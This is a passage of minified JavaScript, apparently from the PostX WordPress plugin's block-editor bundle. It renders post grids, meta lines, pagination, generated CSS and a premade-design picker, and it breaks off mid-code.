b({imgOverlay:e,imgOverlayType:t,imgAnimation:l,post:a,fallbackEnable:n,vidIconEnable:r,showImage:s,idx:p,imgCrop:c,imgCropSmall:u,layout:d,Category:m=null,Video:g=null,onClick:y}){const{showStyleButton:b,StyleButton:v}=(0,i.Z)((e=>{e.stopPropagation(),y()}));return(a.image&&!a.is_fallback||n)&&s&&(0==p||0!=p&&"layout1"===d||"layout4"===d)?(0,o.createElement)("div",{className:`ultp-block-image ultp-block-image-${l} ${!0===e&&0==p?"ultp-block-image-overlay ultp-block-image-"+t+" ultp-block-image-"+t+p:""}`,onClick:b},v,(0,o.createElement)("a",{href:"#"},(0,o.createElement)("img",{alt:a.title||"",src:a.image?a.image[0==p?c:u]:r&&a.has_video?"https://img.youtube.com/vi/"+a.has_video+"/0.jpg":n&&ultp_data.url+"assets/img/ultp-fallback-img.png"})),g,m):null}function v({attributes:e,post:t,idx:l,VideoContent:a,CatCotent:n,onClick:r}){const{fallbackEnable:s,showImage:p,imgAnimation:c,imgOverlay:u,imgOverlayType:d,layout:m,imgCrop:g,vidIconEnable:y,imgCropSmall:b}=e,{showStyleButton:v,StyleButton:h}=(0,i.Z)((e=>{e.stopPropagation(),r()}));return(t.image&&!t.is_fallback||s)&&p&&(0==l||"layout3"==m||"layout2"==m||"layout5"==m)&&(0,o.createElement)("div",{className:`ultp-block-image ultp-block-image-${c} ${!0===u?"ultp-block-image-overlay ultp-block-image-"+d+" ultp-block-image-"+d+l:""}`,onClick:v},h,0==l?(0,o.createElement)(o.Fragment,null,(0,o.createElement)("a",{href:"#"},(0,o.createElement)("img",{alt:t.title||"",src:t.image?t.image[g]:y&&t.has_video?"https://img.youtube.com/vi/"+t.has_video+"/0.jpg":s&&ultp_data.url+"assets/img/ultp-fallback-img.png"})),a):("layout3"===m||"layout2"===m||"layout5"===m)&&(0,o.createElement)(o.Fragment,null,(0,o.createElement)("a",{href:"#"},(0,o.createElement)("img",{alt:t.title||"",src:t.image?t.image[b]:y&&t.has_video?"https://img.youtube.com/vi/"+t.has_video+"/0.jpg":s&&ultp_data.url+"assets/img/ultp-fallback-img.png"})),a),n)}function h({attributes:e,post:t,idx:l,VideoContent:a,CatCotent:n,onClick:r}){const{fallbackEnable:s,showImage:p,imgAnimation:c,imgOverlay:u,imgOverlayType:d,layout:m,imgCrop:g,vidIconEnable:y,imgCropSmall:b}=e,{showStyleButton:v,StyleButton:h}=(0,i.Z)((e=>{e.stopPropagation(),r()}));return(t.image&&!t.is_fallback||s)&&p&&(0==l||"layout3"==m||"layout2"==m||"layout5"==m)&&(0,o.createElement)("div",{className:`ultp-block-image ultp-block-image-${c} ${!0===u?"ultp-block-image-overlay ultp-block-image-"+d+" ultp-block-image-"+d+l:""}`,onClick:v},h,0==l?(0,o.createElement)(o.Fragment,null,(0,o.createElement)("a",{href:"#"},(0,o.createElement)("img",{alt:t.title||"",src:t.image?t.image[g]:y&&t.has_video?"https://img.youtube.com/vi/"+t.has_video+"/0.jpg":s&&ultp_data.url+"assets/img/ultp-fallback-img.png"})),a):("layout3"===m||"layout2"===m||"layout5"===m)&&(t.image&&!t.is_fallback||s)&&(0,o.createElement)(o.Fragment,null,(0,o.createElement)("a",{href:"#"},(0,o.createElement)("img",{alt:t.title||"",src:t.image?t.image[b]:y&&t.has_video?"https://img.youtube.com/vi/"+t.has_video+"/0.jpg":s&&ultp_data.url+"assets/img/ultp-fallback-img.png"})),a),n)}function f({imgOverlay:e,imgOverlayType:t,post:l,fallbackEnable:a,idx:i,imgCrop:n,onClick:r}){return(0,o.createElement)("div",{className:"ultp-block-image "+(!0===e?"ultp-block-image-overlay ultp-block-image-"+t+" ultp-block-image-"+t+i:"")},(0,o.createElement)("a",{href:"#",className:"ultp-component-hover",onClick:e=>e.preventDefault()},(0,o.createElement)("img",{alt:l.title||"",src:l.image?l.image[n]:a&&ultp_data.url+"assets/img/ultp-fallback-img.png"})))}function k({children:e,onClick:t,contentHorizontalPosition:l,contentVerticalPosition:a}){const{showStyleButton:n,StyleButton:r}=(0,i.Z)(t);return(0,o.createElement)("div",{className:`ultp-block-content ultp-block-content-${a} ultp-block-content-${l} ultp-component-hover`,onClick:n},r,e)}},53508:(e,t,l)=>{"use strict";l.d(t,{Z:()=>a});var o=l(67294);function a({loadMoreText:e,onClick:t}){return(0,o.createElement)("div",{className:"ultp-loadmore ultp-component",onClick:e=>{e.stopPropagation(),t()}},(0,o.createElement)("a",{className:"ultp-loadmore-action ultp-disable-editor-click ultp-component-hover"},e))}},46896:(e,t,l)=>{"use strict";l.d(t,{Z:()=>r});var o=l(67294),a=l(64766),i=l(53049);const{__}=wp.i18n,{dateI18n:n}=wp.date;function r({meta:e,post:t,metaSeparator:l,metaStyle:r,metaMinText:s,metaAuthorPrefix:p,metaDateFormat:c,authorLink:u,onClick:d}){const m=e=>{e.preventDefault()},g=e.includes("metaAuthor")?(0,o.createElement)("span",{onClick:e=>{e.stopPropagation(),d()},className:"ultp-block-author ultp-component-simple ultp-block-meta-element"},(0,o.createElement)("img",{className:"ultp-meta-author-img",src:t.avatar_url})):"",y=e.includes("metaAuthor")?(0,o.createElement)("span",{onClick:e=>{e.stopPropagation(),d()},className:"ultp-block-author ultp-component-simple ultp-block-meta-element"},(0,o.createElement)("img",{className:"ultp-meta-author-img",src:t.avatar_url})," ",p," ",(0,o.createElement)("a",{href:u?t.author_link:"#",onClick:m},t.display_name)):"",b=e.includes("metaAuthor")?(0,o.createElement)("span",{onClick:e=>{e.stopPropagation(),d()},className:"ultp-block-author ultp-component-simple ultp-block-meta-element"},a.ZP.user,(0,o.createElement)("a",{href:u?t.author_link:"#",onClick:m},t.display_name)):"",v=e.includes("metaAuthor")?(0,o.createElement)("span",{onClick:e=>{e.stopPropagation(),d()},className:"ultp-block-author ultp-component-simple ultp-block-meta-element"},p,(0,o.createElement)("a",{href:u?t.author_link:"#",onClick:m},t.display_name)):"",h=e.includes("metaDate")?(0,o.createElement)("span",{onClick:e=>{e.stopPropagation(),d()},className:"ultp-block-date ultp-component-simple ultp-block-meta-element"},n((0,i.De)(c),t.time)):"",f=e.includes("metaDate")?(0,o.createElement)("span",{onClick:e=>{e.stopPropagation(),d()},className:"ultp-block-date ultp-component-simple ultp-block-meta-element"},a.ZP.calendar,n((0,i.De)(c),t.time)):"",k=e.includes("metaDateModified")?(0,o.createElement)("span",{onClick:e=>{e.stopPropagation(),d()},className:"ultp-block-date ultp-component-simple ultp-block-meta-element"},n((0,i.De)(c),t.timeModified)):"",w=e.includes("metaDateModified")?(0,o.createElement)("span",{onClick:e=>{e.stopPropagation(),d()},className:"ultp-block-date ultp-component-simple ultp-block-meta-element"},a.ZP.calendar,n((0,i.De)(c),t.timeModified)):"",x=e.includes("metaComments")?(0,o.createElement)("span",{onClick:e=>{e.stopPropagation(),d()},className:"ultp-post-comment ultp-component-simple ultp-block-meta-element "},0===t.comments?t.comments+__("comment","ultimate-post"):t.comments+__("comments","ultimate-post")):"",T=e.includes("metaComments")?(0,o.createElement)("span",{onClick:e=>{e.stopPropagation(),d()},className:"ultp-post-comment ultp-component-simple ultp-block-meta-element"},a.ZP.comment,t.comments):"",_=e.includes("metaView")?(0,o.createElement)("span",{onClick:e=>{e.stopPropagation(),d()},className:"ultp-post-view ultp-component-simple ultp-block-meta-element"},0==t.view?"0 view":t.view+" views"):"",C=e.includes("metaView")?(0,o.createElement)("span",{onClick:e=>{e.stopPropagation(),d()},className:"ultp-post-view ultp-component-simple ultp-block-meta-element"},a.ZP.eye,t.view):"",E=e.includes("metaTime")?(0,o.createElement)("span",{onClick:e=>{e.stopPropagation(),d()},className:"ultp-post-time ultp-component-simple ultp-block-meta-element"},t.post_time," ",__("ago","ultimate-post")):"",S=e.includes("metaTime")?(0,o.createElement)("span",{onClick:e=>{e.stopPropagation(),d()},className:"ultp-post-time ultp-component-simple ultp-block-meta-element"},a.ZP.clock,t.post_time," ",__("ago","ultimate-post")):"",P=e.includes("metaRead")?(0,o.createElement)("span",{onClick:e=>{e.stopPropagation(),d()},className:"ultp-post-read ultp-component-simple ultp-block-meta-element"},t.reading_time," ",s):"",L=e.includes("metaRead")?(0,o.createElement)("span",{onClick:e=>{e.stopPropagation(),d()},className:"ultp-post-read ultp-component-simple ultp-block-meta-element"},a.ZP.book,t.reading_time," ",s):"";return(0,o.createElement)("div",{className:`ultp-block-meta ultp-block-meta-${l} ultp-block-meta-${r}`},"noIcon"==r&&(0,o.createElement)(o.Fragment,null,v," ",h," ",k," ",x," ",_," ",P," ",E),"icon"==r&&(0,o.createElement)(o.Fragment,null,b," ",f," ",w," ",T," ",C," ",S," ",L),"style2"==r&&(0,o.createElement)(o.Fragment,null,v," ",f," ",w," ",T," ",C," ",S," ",L),"style3"==r&&(0,o.createElement)(o.Fragment,null,y," ",f," ",w," ",T," ",C," ",S," ",L),"style4"==r&&(0,o.createElement)(o.Fragment,null,b," ",f," ",w," ",T," ",C," ",S," ",L),"style5"==r&&(0,o.createElement)(o.Fragment,null,(0,o.createElement)("div",{className:"ultp-meta-media"},g),(0,o.createElement)("div",{className:"ultp-meta-body"},v," ",f," ",w," ",T," ",C," ",S," ",L)),"style6"==r&&(0,o.createElement)(o.Fragment,null,g," ",v," ",f," ",w," ",T," ",C," ",S," ",L))}},71411:(e,t,l)=>{"use strict";l.d(t,{Z:()=>i});var o=l(67294),a=l(64766);const{__}=wp.i18n;function i({onClick:e}){return(0,o.createElement)("div",{onClick:t=>{t.stopPropagation(),e()},className:"ultp-next-prev-wrap ultp-disable-editor-click ultp-component"},(0,o.createElement)("ul",{className:"ultp-component-hover"},(0,o.createElement)("li",null,(0,o.createElement)("a",{className:"ultp-prev-action ultp-disable",href:"#"},a.ZP.leftAngle2,(0,o.createElement)("span",{className:"screen-reader-text"},__("Previous","ultimate-post")))),(0,o.createElement)("li",null,(0,o.createElement)("a",{className:"ultp-prev-action",href:"#"},a.ZP.rightAngle2,(0,o.createElement)("span",{className:"screen-reader-text"},__("Next","ultimate-post"))))))}},93985:(e,t,l)=>{"use strict";l.d(t,{Z:()=>i});var o=l(67294),a=l(64766);const{__}=wp.i18n;function i({paginationNav:e,paginationAjax:t,paginationText:l="",pages:i=4,onClick:n}){const r=l.split("|"),s=r[0]||__("Previous","ultimate-post"),p=r[1]||__("Next","ultimate-post");return(0,o.createElement)("div",{onClick:e=>{e.stopPropagation(),n()},className:"ultp-pagination-wrap ultp-disable-editor-click"+(t?" ultp-pagination-ajax-action":"")+" ultp-component"},(0,o.createElement)("ul",{className:"ultp-pagination ultp-component-hover"},(0,o.createElement)("li",null,(0,o.createElement)("a",{href:"#",className:"ultp-prev-page-numbers"},a.ZP.leftAngle2,"textArrow"==e?" "+s:"")),i>4&&(0,o.createElement)("li",{className:"ultp-first-dot"},(0,o.createElement)("a",{href:"#"},"...")),new Array(i>2?3:i).fill(0).map(((e,t)=>(0,o.createElement)("li",{key:t},(0,o.createElement)("a",{href:"#"},t+1)))),i>4&&(0,o.createElement)("li",{className:"ultp-last-dot"},(0,o.createElement)("a",{href:"#"},"...")),i>5&&(0,o.createElement)("li",{className:"ultp-last-pages"},(0,o.createElement)("a",{href:"#"},i)),(0,o.createElement)("li",null,(0,o.createElement)("a",{href:"#",className:"ultp-next-page-numbers"},"textArrow"==e?p+" ":"",a.ZP.rightAngle2))))}},8152:(e,t,l)=>{"use strict";l.d(t,{Z:()=>i});var o=l(67294),a=l(64766);const{__}=wp.i18n;function i({readMoreText:e,readMoreIcon:t,titleLabel:l="",onClick:i}){return(0,o.createElement)("div",{className:"ultp-block-readmore"},(0,o.createElement)("a",{onClick:e=>{e.stopPropagation(),i()},className:"ultp-component-simple","aria-label":l},e||__("Read More","ultimate-post"),a.ZP[t]))}},76005:(e,t,l)=>{"use strict";l.d(t,{Z:()=>a});var o=l(67294);function a({title:e,headingTag:t,titleLength:l,titleStyle:a,onClick:i}){const n=`${t}`;if(e&&0!=l){const t=e.split(" ");e=t.length>l?t.splice(0,l).join(" ")+"...":e}return(0,o.createElement)(n,{className:`ultp-block-title ${"none"===a?"":`ultp-title-${a}`} `},(0,o.createElement)("a",{className:"ultp-component-simple",dangerouslySetInnerHTML:{__html:e},onClick:e=>{e.preventDefault(),e.stopPropagation(),i(e)}}))}},99838:(e,t,l)=>{"use strict";l.d(t,{Kh:()=>g});var o=l(53049),a=l(66464),i=l(69735);const n=(e,t,l)=>e.replace(new RegExp(t,"g"),l),r=e=>"object"==typeof e&&0!=Object.keys(e).length,s=(e,t)=>(e=e.replace(new RegExp("{{WOPB}}","g"),".wopb-block-"+t)).replace(new RegExp("{{ULTP}}","g"),".ultp-block-"+t),p=(e,t)=>{let l="";return t.forEach((e=>{l+=e+";"})),e+"{"+l+"}"},c=(e,t)=>{let l="";return t.forEach((t=>{l+=e+t})),l},u=(e,t,l,o,a=!1,i="")=>{if(o="object"!=typeof o?o:d(o).data,"string"==typeof e){if(e){if(o){let r=s(e,t);return"boolean"==typeof o?[r]:-1==r.indexOf("{{")&&r.indexOf("{")<0?[r+o]:(a&&(i||0==i)&&(r=n(r,"{{"+a+"}}","object"==typeof i?"":i)),[n(r,"{{"+l+"}}",o)])}return[]}return[s(o,t)]}const r=[];return e.forEach((e=>{r.push(n(s(e,t),"{{"+l+"}}",o))})),r},d=e=>e.openTypography?{data:(0,a.zG)(e),action:"append"}:e.openBorder?{data:(0,a.Rc)(e),action:"append"}:e.openShadow&&e.color?{data:(0,a.jE)(e),action:"append"}:void 0!==e.top||void 0!==e.left||void 0!==e.right||void 0!==e.bottom?{data:(0,a.A9)(e),action:"replace"}:e.openColor?e.replace?{data:(0,a.ro)(e),action:"replace"}:{data:(0,a.ro)(e),action:"append"}:e.openFilter?{data:(0,a.Su)(e),action:"replace"}:e.onlyUnit?{data:e._value?e._value+(e.unit||""):"",action:"replace"}:{data:"",action:"append"};function m(e,t,l,o,a,i,n,m,g,y={}){if(!((e,t,l={})=>{let o=!0;return t?.hasOwnProperty("depends")&&t.depends.forEach((t=>{let a;a=l?.id?e[l.key][l.id]?.[t.key]:e[t.key];const i=o;if("=="==t.condition)if("string"==typeof t.value||"number"==typeof t.value||"boolean"==typeof t.value)o=a==t.value;else{let e=!1;t.value.forEach((t=>{a==t&&(e=!0)})),o=e}else if("!="==t.condition)if("string"==typeof t.value||"number"==typeof t.value||"boolean"==typeof t.value)o=a!=t.value;else{let e=!1;Array.isArray(t.value)&&t.value.forEach((t=>{a!=t&&(e=!0)})),e&&(o=!0)}o=0!=i&&o})),o})(e,l,y))return{_lg:[],_sm:[],_xs:[],_notResponsiveCss:[]};let b,v=[],h=[],f=[],k=[];if(b=y?.id?e[y.key][y.id]?e[y.key][y.id][t]:e[y.key].default[t]:e[t],"object"==typeof b){let e=!1,l="";if(b.lg&&(e=!0,l="object"==typeof b.lg?d(b.lg).data:b.lg+(b.ulg||b.unit||""),v=v.concat(u(o,a,t,l,m,"object"==typeof g?g?.lg:g))),b.sm&&(e=!0,l="object"==typeof b.sm?d(b.sm).data:b.sm+(b.usm||b.unit||""),h=h.concat(u(o,a,t,l,m,"object"==typeof g?g?.sm:g))),b.xs&&(e=!0,l="object"==typeof b.xs?d(b.xs).data:b.xs+(b.uxs||b.unit||""),f=f.concat(u(o,a,t,l,m,"object"==typeof g?g?.xs:g))),!e){const e=d(b),l=s(o,a);"object"==typeof e.data?0!=Object.keys(e.data).length&&(e.data.background&&k.push(l+e.data.background),r(e.data.lg)&&v.push(p(l,e.data.lg)),r(e.data.sm)&&h.push(p(l,e.data.sm)),r(e.data.xs)&&f.push(p(l,e.data.xs)),e.data.simple&&k.push(l+e.data.simple),e.data.font&&v.unshift(e.data.font),e.data.shape&&(e.data.shape.forEach((function(e){k.push(l+e)})),r(e.data.data.lg)&&v.push(c(l,e.data.data.lg)),r(e.data.data.sm)&&h.push(c(l,e.data.data.sm)),r(e.data.data.xs)&&f.push(c(l,e.data.data.xs)))):e.data&&-1==e.data.indexOf("{{")&&("append"==e.action?k.push(l+e.data):k.push(u(o,a,t,e.data,m,g)))}}else"hideExtraLarge"==t?i&&(k=k.concat("@media (min-width: "+(n.breakpointSm||992)+"px) {"+u(o,a,t,b,m,g)+"}")):"hideTablet"==t?i&&(k=k.concat("@media only screen and (max-width: "+(n.breakpointSm||991)+"px) and (min-width: 768px) {"+u(o,a,t,b,m,g)+"}")):"hideMobile"==t?i&&(k=k.concat("@media (max-width: "+(n.breakpointXs||767)+"px) {"+u(o,a,t,b,m,g)+"}")):b&&(k=k.concat(u(o,a,t,b,m,g)));return{_lg:v,_sm:h,_xs:f,_notResponsiveCss:k}}const g=(e,t,l,a=!1)=>{if(!l)return;let r="",p=[],c=[],u=[],d=[];const g=function(){const e=localStorage.getItem("ultpGlobal"+ultp_data.blog);if(e)try{const t=JSON.parse(e);return"object"==typeof t?t:{}}catch{return{}}return{}}();if(Object.keys(e).forEach((o=>{const r="string"==typeof t?wp.blocks.getBlockType(t).attributes:t,y=r[o]?.anotherKey,b=e[y];r[o]&&r[o].hasOwnProperty("style")?r[o].style.forEach(((t,i)=>{if(t?.hasOwnProperty("selector")){const i=t.selector,{_lg:n,_sm:r,_xs:s,_notResponsiveCss:v}=m(e,o,t,i,l,a,g,y,b);p=p.concat(n),c=c.concat(r),u=u.concat(s),d=d.concat(v)}})):((0,i.o6)()&&e.dcEnabled&&"dcFields"===o&&e[o].forEach((t=>{var o;t&&(Object.keys(null!==(o=e.dcGroupStyles[t.id])&&void 0!==o?o:e.dcGroupStyles.default).forEach((o=>{r.dcGroupStyles.fields[o].style?.forEach((i=>{const n=i.selector.replace("{{dcID}}",t.id),{_lg:r,_sm:s,_xs:v,_notResponsiveCss:h}=m(e,o,i,n,l,a,g,y,b,{id:t.id,key:"dcGroupStyles"});p=p.concat(r),c=c.concat(s),u=u.concat(v),d=d.concat(h)}))})),t.fields.forEach((t=>{var o;Object.keys(null!==(o=e.dcFieldStyles[t.id])&&void 0!==o?o:e.dcFieldStyles.default).forEach((o=>{r.dcFieldStyles.fields[o].style?.forEach((i=>{const n=i.selector.replace("{{dcID}}",t.id),{_lg:r,_sm:s,_xs:v,_notResponsiveCss:h}=m(e,o,i,n,l,a,g,y,b,{id:t.id,key:"dcFieldStyles"});p=p.concat(r),c=c.concat(s),u=u.concat(v),d=d.concat(h)}))}))})))})),r[o]&&"array"==r[o].type&&r[o].hasOwnProperty("fields")&&Object.keys(r[o].fields).forEach((t=>{r[o].fields[t].hasOwnProperty("style")&&r[o].fields[t].style.forEach(((a,i)=>{a?.hasOwnProperty("selector")&&Array.isArray(e[o])&&e[o].forEach(((e,o)=>{let i=s(a.selector,l);var r;r=o,i=i.replace(new RegExp("{{REPEAT_CLASS}}","g"),".ultp-repeat-"+r),i=n(i,"{{"+t+"}}",e[t]),d.push(i)}))}))})))})),p.length>0&&(r+=p.join("")),c.length>0&&(r+="@media (max-width: "+(g.breakpointSm||991)+"px) {"+c.join("")+"}"),u.length>0&&(r+="@media (max-width: "+(g.breakpointXs||767)+"px) {"+u.join("")+"}"),d.length>0&&(r+=d.join("")),a)return"true"==ultp_data.settings?.ultp_custom_font&&ultp_data.active?(0,o.RQ)(r,!0):r;"true"==ultp_data.settings?.ultp_custom_font&&(r=(0,o.RQ)(r,!0)),y(r,l)},y=(e,t)=>{if(wp.data.select("core/edit-post")||document.body.classList.contains("site-editor-php")){const l=window.document.getElementsByName("editor-canvas");l[0]?.contentDocument?setTimeout((function(){b(l[0]?.contentDocument,e,t)}),0):b(window.document,e,t)}else b(window.document,e,t)},b=(e,t,l)=>{if(null===(e=e||window.document).getElementById("ultp-block-"+l)){const o=document.createElement("style");o.type="text/css",o.id="ultp-block-"+l,o.styleSheet?o.styleSheet.cssText=t:o.innerHTML=t,e.getElementsByTagName("head")[0].appendChild(o)}else e.getElementById("ultp-block-"+l).innerHTML=t}},66464:(e,t,l)=>{"use strict";l.d(t,{A9:()=>d,Rc:()=>s,Su:()=>g,jE:()=>r,ro:()=>m,zG:()=>u});var o=l(60448),a=l(53049);const i=!((!ultp_data.settings?.hasOwnProperty("disable_google_font")||"yes"==ultp_data.settings.disable_google_font)&&ultp_data.settings?.hasOwnProperty("disable_google_font")),n=["Arial","Tahoma","Verdana","Helvetica","Times New Roman","Trebuchet MS","Georgia"],r=e=>"{ box-shadow:"+(e.inset||"")+" "+e.width.top+"px "+e.width.right+"px "+e.width.bottom+"px "+e.width.left+"px "+e.color+"; }",s=e=>((e=Object.assign({},{type:"solid",width:{},color:"#e5e5e5"},e)).width.unit&&e.width.unit,`{ border-color:  ${e.color?e.color:"#555d66"}; border-style: ${e.type?e.type:"solid"}; border-width: ${d(e.width)}; }`),p=(e,t)=>{const l={};return e&&e.lg&&(l.lg=t.replace(new RegExp("{{key}}","g"),e.lg+((0,o.MR)(e.lg)?e.ulg||e.unit||"px":""))),e&&e.sm&&(l.sm=t.replace(new RegExp("{{key}}","g"),e.sm+((0,o.MR)(e.sm)?e.usm||e.unit||"px":""))),e&&e.xs&&(l.xs=t.replace(new RegExp("{{key}}","g"),e.xs+((0,o.MR)(e.xs)?e.uxs||e.unit||"px":""))),l},c=(e,t)=>(e.lg&&t.lg.push(e.lg),e.sm&&t.sm.push(e.sm),e.xs&&t.xs.push(e.xs),t),u=e=>{let t="";e.family&&"none"!=e.family&&(n.includes(e.family)||(0,a.RQ)().some((t=>t.n==e.family))||i&&(0,o.MR)(e.family)&&(t="@import url('https://fonts.googleapis.com/css?family="+e.family.replace(" ","+")+":"+(e.weight||400)+"');"));const l=!(!e.family||(0,o.MR)(e.family)&&!n.includes(e.family)&&!(0,a.RQ)().some((t=>t.n==e.family)))||i;let r={lg:[],sm:[],xs:[]};e.size&&(r=c(p(e.size,"font-size:{{key}}"),r)),e.height&&(r=c(p(e.height,"line-height:{{key}} !important"),r)),e.spacing&&(r=c(p(e.spacing,"letter-spacing:{{key}}"),r));const s="{"+(e.family&&l&&"none"!=e.family?"font-family:"+e.family+","+(e.type||"sans-serif")+";":"")+(e.weight?"font-weight:"+e.weight+";":"")+(e.color?"color:"+e.color+";":"")+(e.style?"font-style:"+e.style+";":"")+(e.transform?"text-transform:"+e.transform+";":"")+(e.decoration?"text-decoration:"+e.decoration+";":"")+"}";return{lg:r.lg,sm:r.sm,xs:r.xs,simple:s,font:t}},d=e=>{const t=e.unit?e.unit:"px";return""!=e.top&&null!=e.top||""!=e.right&&null!=e.right||""!=e.bottom&&null!=e.bottom||""!=e.left&&null!=e.left?(e.top||0)+t+" "+(e.right||0)+t+" "+(e.bottom||0)+t+" "+(e.left||0)+t:""},m=e=>{let t=e.clip?"-webkit-background-clip: text; -webkit-text-fill-color: transparent;":"";if("color"==e.type)t+=e.color?"background-color: "+e.color+";":"";else if("gradient"==e.type&&e.gradient)"object"==typeof e.gradient?"linear"==e.gradient.type?t+="background-image : linear-gradient("+e.gradient.direction+"deg, "+e.gradient.color1+" "+e.gradient.start+"%,"+e.gradient.color2+" "+e.gradient.stop+"%);":t+="background-image : radial-gradient( circle at "+e.gradient.radial+" , "+e.gradient.color1+" "+e.gradient.start+"%,"+e.gradient.color2+" "+e.gradient.stop+"%);":t+="background-image:"+e.gradient+";";else if("image"==e.type){var l;(e.fallbackColor||e.color)&&(t+="background-color:"+(null!==(l=e.fallbackColor)&&void 0!==l?l:e.color)+";"),e.image&&(t+='background-image: url("'+e.image+'");'+(e.position?"background-position-x:"+100*e.position.x+"%;background-position-y:"+100*e.position.y+"%;":"")+(e.attachment?"background-attachment:"+e.attachment+";":"")+(e.repeat?"background-repeat:"+e.repeat+";":"")+(e.size?"background-size:"+e.size+";":""))}else"video"==e.type&&e.fallback&&(t+='background-image: url("'+e.fallback+'"); background-size: cover; background-position: 50% 50%');return e.replace?t:"{"+t+"}"},g=e=>{let t="";return e.hue&&(t=" hue-rotate("+e.hue+"deg)"),e.saturation&&(t+=" saturate("+e.saturation+"%)"),e.brightness&&(t+=" brightness("+e.brightness+"%)"),e.contrast&&(t+=" contrast("+e.contrast+"%)"),e.invert&&(t+=" invert("+e.invert+"%)"),e.blur&&(t+=" blur("+e.blur+"px)"),"filter:"+t+";"}},18958:(e,t,l)=>{"use strict";l.d(t,{Z:()=>c});var o=l(67294),a=l(8949),i=l(64766),n=(l(60448),l(87763)),r=l(83100);const{__}=wp.i18n,{useState:s,useEffect:p}=wp.element,c=e=>{const{clientId:t,attributes:l,label:c,name:u}=e.store,[d,m]=s({designList:[],error:!1,reload:!1,reloadId:"",templatekitCol:"ultp-templatekit-col3",fetch:!1,loading:!1}),{designList:g,error:y,reload:b,reloadId:v,templatekitCol:h,fetch:f,loading:k}=d,[w,x]=s(!1),[T,_]=s([]),[C,E]=s(!1),S=async()=>{m({...d,loading:!0});const e=u.split("/");wp.apiFetch({path:"/ultp/v2/fetch_premade_data",method:"POST",data:{type:"design"}}).then((t=>{if(t.success){const l=JSON.parse(t.data);e[1]&&void 0===l[e[1]]?(x(!0),P()):(m({...d,loading:!1,designList:l[e[1]]}),x(!1))}}))};p((()=>{I("","","fetchData"),S()}),[]);const P=()=>{m({...d,fetch:!0}),wp.apiFetch({path:"/ultp/v2/fetch_premade_data",method:"POST",data:{type:"fetch_all_data"}}).then((e=>{e.success&&(S(),m({...d,fetch:!1}))}))},L=e=>{const{replaceBlock:o}=wp.data.dispatch("core/block-editor"),a=["queryNumber","queryNumPosts","queryType","queryTax","queryRelation","queryOrderBy","queryOrder","queryInclude","queryExclude","queryAuthor","queryOffset","metaKey","queryExcludeTerm","queryExcludeAuthor","querySticky","queryUnique","queryPosts","queryCustomPosts"];window.fetch("https://ultp.wpxpo.com/wp-json/restapi/v2/single-design",{method:"POST",body:new URLSearchParams("license="+ultp_data.license+"&design_id="+e)}).then((e=>e.text())).then((e=>{if((e=JSON.parse(e)).success&&e.rawData){const i=wp.blocks.parse(e.rawData);let n=i[0].attributes;for(let e=0;e<a.length;e++)n[a[e]]&&delete n[a[e]];n=Object.assign({},l,n),i[0].attributes=n,m({...d,error:!1,reload:!1,reloadId:""}),o(t,i)}else m({...d,error:!0,reload:!1,reloadId:""})})).catch((e=>{console.error(e)}))},I=(e,t="",l="")=>{wp.apiFetch({path:"/ultp/v2/premade_wishlist_save",method:"POST",data:{id:e,action:t,type:l}}).then((e=>{e.success&&_(Array.isArray(e.wishListArr)?e.wishListArr:Object.values(e.wishListArr||{}))}))},B=(0,o.createElement)("span",{className:"ultp-templatekit-design-template-modal-title"},(0,o.createElement)("img",{src:ultp_data.url+`assets/img/blocks/${e.store.name.split("/")[1]}.svg`}),(0,o.createElement)("span",null,e.store.name.split("/")[1].replace("-"," ").replace("-"," #"))),U=(0,r.Z)("","blockPatternPro",ultp_data.affiliate_id);return(0,o.createElement)("div",{className:"ultp-templatekit-design-template-container ultp-templatekit-list-container ultp-predefined-patterns"},c&&(0,o.createElement)("label",null,c),(0,o.createElement)("div",{className:"ultp-popup-header "},(0,o.createElement)("div",{className:"ultp-popup-filter-title"},(0,o.createElement)("div",{className:"ultp-popup-filter-image-head"},B),(0,o.createElement)("div",{className:"ultp-popup-filter-sync-close"},(0,o.createElement)("span",{className:"ultp-templatekit-iconcol2 "+("ultp-templatekit-col2"==h?"ultp-lay-active":""),onClick:()=>m({...d,templatekitCol:"ultp-templatekit-col2"})},n.Z.grid_col1),(0,o.createElement)("span",{className:"ultp-templatekit-iconcol3 "+("ultp-templatekit-col3"==h?"ultp-lay-active":""),onClick:()=>m({...d,templatekitCol:"ultp-templatekit-col3"})},n.Z.grid_col2),(0,o.createElement)("div",{className:"ultp-premade-wishlist-con"},(0,o.createElement)("span",{className:"ultp-premade-wishlist cursor "+(C?"ultp-wishlist-active":""),onClick:()=>{E(!C)}},i.ZP[C?"love_solid":"love_line"])),(0,o.createElement)("div",{onClick:()=>P(),className:"ultp-filter-sync"},(0,o.createElement)("span",{className:"dashicons dashicons-update-alt"+(f?" rotate":"")}),__("Synchronize","ultimate-post")),(0,o.createElement)("button",{className:"ultp-btn-close",onClick:()=>e.closeModal(),id:"ultp-btn-close"},(0,o.createElement)("span",{className:"dashicons dashicons-no-alt"}))))),g?.length?(0,o.createElement)(o.Fragment,null,(0,o.createElement)("div",{className:`ultp-premade-grid ultp-templatekit-content-designs ${h}`},g.map(((e,t)=>(!C||C&&T?.includes(e.ID))&&(0,o.createElement)("div",{key:t,className:"ultp-card ultp-item-list"},(0,o.createElement)("div",{className:"ultp-item-list-overlay"},(0,o.createElement)("a",{className:"ultp-templatekit-img",href:e.liveurl,target:"_blank",rel:"noreferrer"},(0,o.createElement)("img",{src:e.image,loading:"lazy",alt:e.title})),(0,o.createElement)("div",{className:"ultp-list-dark-overlay"},e.pro?!ultp_data.active&&(0,o.createElement)("span",{className:"ultp-templatekit-premium-btn"},__("Pro","ultimate-post")):(0,o.createElement)("span",{className:"ultp-templatekit-premium-btn ultp-templatekit-premium-free-btn"},__("Free","ultimate-post")),(0,o.createElement)("a",{className:"ultp-overlay-view",href:"https://www.wpxpo.com/postx/patterns/#demoid"+e.ID,target:"_blank",rel:"noreferrer"},(0,o.createElement)("span",{className:"dashicons dashicons-visibility"})," ",__("Live Preview","ultimate-post")))),(0,o.createElement)("div",{className:"ultp-item-list-info ultp-p10"},(0,o.createElement)("span",{className:"ultp-templatekit-title"},e.name),(0,o.createElement)("span",{className:"ultp-action-btn"},(0,o.createElement)("span",{className:"ultp-premade-wishlist",onClick:()=>{I(e.ID,T?.includes(e.ID)?"remove":"")}},i.ZP[T?.includes(e.ID)?"love_solid":"love_line"]),e.pro&&!ultp_data.active?(0,o.createElement)("a",{className:"ultp-btns ultpProBtn",target:"_blank",href:U,rel:"noreferrer"},__("Upgrade to Pro","ultimate-post"),"  